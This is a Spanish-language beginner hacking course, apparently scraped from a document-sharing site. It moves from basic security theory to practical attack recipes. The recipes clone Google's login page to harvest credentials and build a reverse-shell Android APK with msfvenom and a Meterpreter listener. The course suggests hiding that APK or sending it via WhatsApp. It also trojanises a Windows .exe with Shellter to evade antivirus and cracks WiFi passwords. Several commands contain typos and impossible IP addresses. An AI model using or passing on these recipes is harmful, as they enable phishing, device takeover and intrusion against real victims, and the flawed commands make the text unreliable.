Você está na página 1de 12

Curso de Hacking

para Principiantes

ARMANDO GUZMAN NAJAR


Curso de Hacking
para Principiantes

ARMANDO GUZMAN NAJAR


DISCLAIMER
1.- El proposito de este curso e información es para uso informativo y
académico.
2.-Acceder a información sin autorización es un delito.
3.-Watch_Dogs Hacking no se hace responsable por el uso indebido de lo
aprendido en este curso.

Los Mandamientos del Hacker


1.-Nunca destroces nada intencionalmente en la computadora
que estés hackeando.
2.-Para formar parte de este gremio es importante que estés
permanentemente conectado a la red y en constante comunicación
con los hackers, ya sea por vía e-mail o a través de las convenciones.
3.-Por nada del mundo dejes tu dirección real, tu nombre o tu teléfono
en ningún sistema, ya que alguien puede aprovechar esa información
y hacer mal uso de ella.
4.-Ten cuidado a quien le pasas información. De ser posible,
mejor no lo hagas si no conoces a la persona o los fines a que
tiene destinado ese archivo.
5.-Un hacker debe proponer cambios tecnológicos, para que cada vez
sean más los interesados en ellos, ya que su deber es ayudar a las
empresas a verificar si los sistemas y las redes son efectivamente seguros.
6.-Respeta y protege la privacidad.
7.-Comparte los datos y el software, ya que un hacker es todo aquel
que trabaja con gran pasión y entusiasmo por lo que hace.
8.-Promueve el derecho a las comunicación de todas las personas
y en todo el mundo.
9.-Pon a prueba la seguridad y la integridad de todos los sistemas
informáticos a tu alcance.
10.-Tu misión: crea arte y belleza en una computadora. La idea es innovar
con nuevos programas que faciliten la vida de los usuarios.

https://www.facebook.com/watchdogsgdl/
Parte 1: Teoria

¿Que es un hacker?
Según su propio diccionario, un hacker “es todo individuo que se dedica a programar de
forma entusiasta, o sea un experto entusiasta de cualquier tipo”, y fuera del ámbito
informático se le llama “hacker” a toda persona que implementa soluciones para cualquier
sistema, sea informático o no, de manera que éste pueda emplearse de formas no pensadas por
quienes crearon dichos sistemas. Así mismo, en la era actual 2.0 el término hacker se asocia
a toda persona que manipula o que posee conocimientos prácticos que modifican los usos de
las cosas de modo que éstas puedan emplearse para fines no previstos en su origen.

Para el público general, mencionar la palabra “hacker” evoca a alguien que usa su PC para
entrar en un sitio sin autorización y cometer actos fraudulentos. Pero en realidad existen
varias clases de hackers en el mundo (no hay que confundir el término “hacker” con el término
“pirata informático”), tres para ser más exactos, y te las vamos a describir para que veas porque
hacerse white hat hacker es una de las profesiones con más futuro de 2018 por lo
demandados que son sus servicios.

White Hat Hacker: Los hackers con sentido ético, en este grupo se engloban tanto los investigadores
de seguridad como aquellos que rompen sistemas por razones no maliciosas para probar sus propios
códigos de seguridad, o para demostrar a un cliente o en una empresa en la que trabajan que
el software y los protocolos no son seguros. Son los que notifican a las compañías si ven
vulnerabilidades aprovechables, y a cambio se les puede pagar de 500 a 100.000 dólares incluso,
dependiendo de la importancia del problema, de la posible brecha en potencia y del renombre
de la compañía.

Gray Hat Hacker: A medio camino entre uno y otro bando, los hackers en la zona gris pueden ser
tanto contratistas de Defensa como individuos anónimos o grupos de estos que hackean un sistema
o toda una compañía y después les comunican lo que han hecho y cómo podrían arreglar sus fallos
de seguridad. Su ambigüedad estriba en que venden la información que han obtenido, pero lo hacen
por el bien del público. Aunque existen gobiernos que pagan por estos datos y las herramientas de
hackeo y no los usan para tapar agujeros de seguridad, sino a su favor para espiar a potencias
enemigas.

Black Hat Hacker: Considerados directamente como criminales y ejemplificando todo lo negativo
en que solemos pensar al leer el término ‘hacker’, un black hat es un hacker que “viola la seguridad
de un dispositivo para poco menos que provecho personal y de mala fe”. Hablamos de los que
hacen los virus malware, ransomware, todo el SPAM que recibimos en el correo, las brechas de
seguridad dentro de las grandes empresas, etc, para entrar, modificar o destrozar datos según les
convengan. Y también para robar datos de usuarios y venderlos a quien pague más.

Cualidades de la Seguridad de la información


Confidencialidad: Asegurar que nadie es capaz de acceder a la información salvo su
destinatario.
Integridad: Asegurarse que nadie es capaz de modificar la información que recibe el
receptor.
Disponibilidad: Asegurarse que la información siempre esté disponible a quienes
deben acceder a ella.

https://www.facebook.com/watchdogsgdl/
Metodologías para asegurar la información
Test de penetración: Mejor conocido como pen-testing, es la metodología de probar
una y otra vez un sistema hasta encontrar una vulnerabilidad, y a partir de ahí, mejorar
el sistema, si se hace suficientes veces la información del sistema sera mas difícil de
comprometer.

Tipos de pen-testing
Auditoría de “Caja blanca”: son las auditorías que se realizan con acceso a la información
interna de la empresa, por ejemplo: detalles de la red como: segmentos de red, mapa de red,
firewall, impresora en red, sistemas operativos utilizados, tipo de autenticación, usuarios,
tecnología del sitio web, etc. Se puede utilizar para simular un ataque a la infraestructura
de una persona que pertenece a la organización, por ejemplo un trabajador cabreado.
Es útil porque no se invierte tiempo en el “fingerprint” (descubrimiento) de la infraestructura,
sistemas utilizados, etc.

Auditoría de “Caja gris”: es la auditoría que mezcla características de las dos anteriores,
posiblemente sea la mejor porque simulemos un ataque y a la vez consigamos un mejor
código de nuestras aplicaciones, se pude dar a conocer parte de la información al auditor
y pedirle que a partir de ella intente “escalar” al resto del sistema además se puede intentar
este test comenzando desde varios puntos, red interna, red externa, a través del wifi,
a través del puesto de un empleado, a traves de la extranet, etc.

Auditoría de “Caja negra”: es la auditoría que se realiza sin dar ningún tipo de información
al auditor y es el quien debe descubrir el segmento de red, los sistemas utilizados,
la tecnología del sitio web, etc.
Es útil para simular un ataque de un intruso real y darnos una idea de las consecuencias
que esto puede tener, puede llevar mas tiempo.

¿Por donde atacar?


Seguridad Física: Se refiere a cuando un atacante compromete la información
evadiendo barreras físicas como puertas, candados y seguros.

Seguridad Lógica: Es la seguridad de los sistemas informáticos, es decir, dentro de un


servidor o computadora.

Ingeniería Social: Es la metodología NO técnica de utilizar los defectos de las personas


para llegar al objetivo.

La Ingeniería Social es el método con mayor indice de ataques exitosos y eso


se debe a 5 factores:

1.- Todos queremos ayudar.


2.- El primer movimiento siempre de confianza hacia el otro.
3.- No nos gusta decir NO.
4.- A todos nos gusta que nos alaben.
5.- Nadie esta esperando un ataque.

https://www.facebook.com/watchdogsgdl/
Tipos de Ataques
Ataques Pasivos: Se busca obtener y monitorear la información SIN alertar al usuario
o sus datos.

Ataques Activos: Estos alteran la información o comprometen su disponibilidad, afectando


de forma directa al sistema, el usuario usualmente notará el ataque.

Fases de un Ataque
Fase 1: Reconnaissance (Reconocimiento)

Esta etapa involucra la obtención de información (Information Gathering) con respecto a una
potencial víctima que puede ser una persona u organización. Por lo general, durante esta
fase se recurre a diferentes recursos de Internet como Google,entre tantos otros, para recolectar
datos del objetivo. Algunas de las técnicas utilizadas en este primer paso son la Ingeniería
Social, el Dumpster Diving, el sniffing.

Fase 2: Scanning (Exploración)

En esta segunda etapa se utiliza la información obtenida en la fase 1 para sondear el blanco y
tratar de obtener información sobre el sistema víctima como direcciones IP, nombres de host,
datos de autenticación, entre otros. Entre las herramientas que un atacante puede emplear
durante la exploración se encuentra el network mappers, port mappers, network scanners,
port scanners, y vulnerability scanners.

Fase 3: Gaining Access (Obtener acceso)

En esta instancia comienza a materializarse el ataque a través de la explotación de las


vulnerabilidades y defectos del sistema (Flaw exploitation) descubiertos durante las fases
de reconocimiento y exploración. Algunas de las técnicas que el atacante puede utilizar
son ataques de Buffer Overflow, de Denial of Service (DoS), Distributed Denial of Service (Ddos),
Password filtering y Session hijacking.

Fase 4: Maintaining Access (Mantener el acceso)

Una vez que el atacante ha conseguido acceder al sistema, buscará implantar herramientas
que le permitan volver a acceder en el futuro desde cualquier lugar donde tenga acceso a Internet.
Para ello, suelen recurrir a utilidades backdoors, rootkits y troyanos.

Fase 5: Covering Tracks (Borrar huellas)

Una vez que el atacante logró obtener y mantener el acceso al sistema, intentará borrar todas
las huellas que fue dejando durante la intrusión para evitar ser detectado por el profesional de
seguridad o los administradores de la red. En consecuencia, buscará eliminar los archivos de registro
(log) o alarmas del Sistema de Detección de Intrusos (IDS).

https://www.facebook.com/watchdogsgdl/
Parrot
Parrot es una distribución de Linux basada en Debian, que se especializa en la seguridad
informatica.
Al iniciar Parrot es recomendable actualizarlo, para hacer esto se ingresa en la Terminal
el comando: apt-get updade && apt-get upgrade, esto actualiza el sistema e instala
nuevas versiones. (Para este curso no necesitas hacerlo, pero hazlo cuando comiences
a trabajar por tu cuenta).

Comandos Basicos
ifconfig: Te da información sobre tu red, como tu IP local y global.
route -n: Te da la IP del router en el que estas conectado.
cal: El comando “cal” significa calendario y simplemente muestra el calendario en su pantalla.
who: El comando “who” muestra todos los usuarios que se han registrado en el sistema actualmente.
El texto tty2 es la línea de terminal que el usuario está usando y la siguiente línea indica la fecha y
la hora actual.
ls: El comando “ls” simplemente muestra el contenido de un directorio.
cd: “cd” significa “cambio de directorio” (change directory) y cambia del directorio actual a un
nuevo directorio.
man: El comando “man” significa “manual” y puede mostrar el manual incorporado para la mayoría
de los comandos que necesitamos. Digamos que es como escribir “/?” para Windows.
mkdir: “mkdir” significa “crear directorio” (make directory) y crea un nuevo directorio. Usamos “cd”
(comando visto anteriormente) para entrar en el directorio recién creado.
rmdir: El comando “rmdir” significa “remover directorio” (remove directory) y elimina cualquier
directorio que queramos eliminar.
pwd: El comando “pwd” significa “directorio actual de trabajo” (present working directory) y como
dice el nombre, muestra el directorio en el que nos encontramos actualmente.
touch: El comando “touch” crea un archivo (no un directorio) y puede agregar una extensión
como .txt para que sea un archivo de texto.
cp: Este comando “cp” significa “copia” (Copy) y simplemente copia y pega el archivo donde
se especifique.
mv: El comando “mv” significa ‘mover’ y simplemente mueve un archivo de un directorio a
otro directorio.
rm: El comando “rm” se utilizar para eliminar y añadiendo “-r” simplemente elimina de forma
forzada un archivo sin preguntar al usuario.
chmod: El comando “chmod” significa “Cambiar el modo de comando” (change mode command).
Como hay muchos modos en Unix, este se pueden utilizar para manipular los archivos.
Básicamente hay 3 modos que podemos utilizar con el comando “chmod”
+w: Sigla de escritura (write) que cambia los permisos de un archivo para escribir.
+r: Sigla de lectura (read) y modifica los permisos del archivo para leer.
+x: Generalmente se usa para hacer un archivo ejecutable.
file: El comando “file” muestra el tipo de archivo. Como mencioné anteriormente Linux trata
todo como archivo.
sort: Como su nombre sugiere (si es que conoces de inglés), el comando “sort” ordena el
contenido del archivo de acuerdo con las reglas ASCII.
grep: grep es un acrónimo para “buscar globalmente una expresión regular e imprimirla”
(globally search a regular expression and print it). El comando “grep” busca la entrada especificada
completamente (globalmente) para una coincidencia con el patrón escrito, y lo muestra.
Para omitir entre mayúsculas y minúsculas se agrega -i
clear: El comando “clear” se utiliza para limpiar el terminal y que pueda escribir con más precisión.
Alternativamente puede presionar las teclas Ctrl + L
https://www.facebook.com/watchdogsgdl/
Parte 2: Práctica
Escaneo: NMAP

NMAP es una herramienta para hacer escaneos a servidores y computadoras, y es util


para trabajos de reconocimiento y escaneo.

Primero, vamos a realizar un escaneo de reconocimiento en nuestra propia red, esto


nos permitir’a visualizar que computadoras estan en nuestra red y un poco de información
de ellas.

El comando en la terminal para esto es:

nmap -sP (cualquier IP en la red)/24 ejemplo: nmap -sP 206.258.100.1/24


Este comando está diciendole a Nmap que escanee a todas las IP dentro de la subred
en la que tu estas.

Ahora, vamos a realizar un escaneo mucho mas grande, con el comando:

nmap (IP/URL) -vv ejemplo: nmap 206.258.100.1 -vv

Nmap escanea 1000 puertos del objetivo, que puede ser un servidor o una PC, la “vv” le
dice que lo muestre de forma grafica en la terminal.

Para hacer un escaneo mas especifico, buscando solo un puerto en especial, un ejemplo
de sintaxis puede ser:

nmap -oG -(IP) -p (# de puerto) -vv ejemplo: nmap -oG -206.258.0.1 -p 80 -vv

Este comando escanea solo el puerto e IP especificados y guarda el reporte en tu PC.

Hay muchas formas de reconocimiento utilizando Nmap, otro ejemplo es el de obtener el


OS de una PC o servidor, para eso utilizaremos:

nmap -O (IP) ejemplo: nmap -O 206.258.16.1


Pero las cosas no se acaban con nmap, hay muchas opciones de reconocimiento, un ejemplo
es el comando:

curl ipinfo.io/ (IP) ejemplo: curl ipinfo.io/ 206.258.16.1

Este comando te permitirá encontrar la locacion aproximada de tu objetivo.

Otra opción es utilizar netscan en cualquier OS para visualizar sus conexiones, o podrias
utilizar ingenieria social con paginas como www.whatstheirip.com

https://www.facebook.com/watchdogsgdl/
Ataque de Ingenieria social (Phishing)
Este ataque cae dentro de la categoría de “Phising”, en esta ocasión vamos a crear
una pagina falsa que clonaremos de Google, que escanee los campos de usuario y
contraseña, para hacerlo sigue los pasos siguientes:

1.- Abrir terminal


2.- Escribir setollkit
3.- Aceptar todo lo que aparezca
4.- Social-Engineering-Attacks
5.- Website Attack Vectors
6.- Credential harvester
7.- Site Cloner
8.- Ingresar nuestra IP
9.- Ingresar URL de la pagina a clonar

https://www.facebook.com/watchdogsgdl/
Android Hacking
Para atacar a in dispositivo Android, lo que haremos será crear un archivo .apk
malware, esto nos permitira obtener acceso al dispositivo una vez que se instale; es
importante que sepas que este es un curso de principiante y la metodología es basica,
asi que solo te enseñaremos a crear el archivo, puedes investigar en internet para ocultar
tu malware en otro .apk, o en imagenes o hasta enviarlo por whatsapp.

Nota. Este mismo metodo es el que utilizaras para crear archivos .exe.

Para crear nuestro .apk, utilizaremos una extensión de metasploit que se llama
msfvenom. Los pasos a seguir son:

1.- Escribe en la terminal


msfvenom -p android/meterpreter/reverse_tcp LHOST=(IP) LSPORT=(# de puerto) R> hack.apk

ejemplo:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 LSPORT=443 R> hack.apk
Nota: es preferible utilizar los puertos 443 o 4444

2.- En terminal escribe msfconsole


3.- Escribe use/exploit/multi/handler
4.- Escribe set payload android/meterpreter/reverse_tcp
5.- Escribe set lhost (IP)
6.- Escribe set lport 443 o 4444 segun lo hayas escrito en el primer paso
7.- Escribe exploit para empezar a monitorear

Nota: Utiliza el comando “h” para saber que funciones puedes ejecutar

https://www.facebook.com/watchdogsgdl/
Malware para Windows
En esta sección utilizaremos el mismo tipo de malware que metasploit maneja y se crea con
el mismo procedimiento que la sección anterior. El problema de este malware es que es
muy fácil de detectar y por ello solamente funcionará en equipos desactualizados o que
no tengan antivirus.

Pero no te desanimes todavía, hay un método que te permitirá sacarle la vuelta a muchos
de los antivirus en el mercado, la herramienta se llama Shellter y lo que hace es recodificar
el malware de forma que sea mas dicifil para un antivirus detectarlo.

Después de instalar Shellter (El cual es un programa nativo de Windows) haremos lo


siguiente:

1.- Escribe en la terminal shellter


2.- Selecciona Auto
3.- Selecciona un .exe con el que quieras ocultar tu malware
4.- Selecciona Lista
5.- Elige el Malware que utilizaras
6.- Ingresa tu IP y Puerto
7.- Escibe en otra terminal msfconsole
8.- Escribe set payload windows/meterpreter/reverse_tcp
9.- Escribe set lhost (IP)
10.- Escribe set lport 443 o set4444
11.- Escribe exploit para comenzar a monitorear

https://www.facebook.com/watchdogsgdl/
Ataque Wifi

Fern Wifi Cracker


En esta sección utilizaremos una de las herramientas mas sencillas para obtener la clave
de un wifi que Parrot tiene preinstalado, sin embargo es muy importante que tu tarjeta wifi
soporte el modo de monitoreo, si tu tarjeta no cuenta con este modo sera necesario que
adquieras un dispositivo externo, uno de los mejores para este tipo de casos es el
ALFA NETWORK USB Wireless Card Modelo: AWUS036H es economico y facil de
adquirir.

Antes de abrir Fern, necesitamos activar el modo monitoreo en nuestra tarjeta wifi, para
hacerlo abre una terminal y escribe el siguiente comando:

airmon-ng start wlan0

Ahora abre Fern Wireless Cracker y sigue estos pasos:

1.- Selecciona tu tarjeta wifi (wlan0)


2.- Selecciona Scan for Access Points
3.- Al terminar el escaneo selecciona el tipo de red que quieres crackear, puede ser WEP o WPA
4.- Selecicona la red que deseas hackear
5.- Selecciona la casilla Automate
6.- Selecciona WiFi Attack y espera a que la herramienta termine sus procesos

Nota: Para redes WPA es necesario que cuentes con un diccionario de palabras, Fern cuenta
con un diccionario predeterminado pero es recomendable que bajes otros de internet o que
hagas tu propio diccionario con “Crunch”

https://www.facebook.com/watchdogsgdl/

Você também pode gostar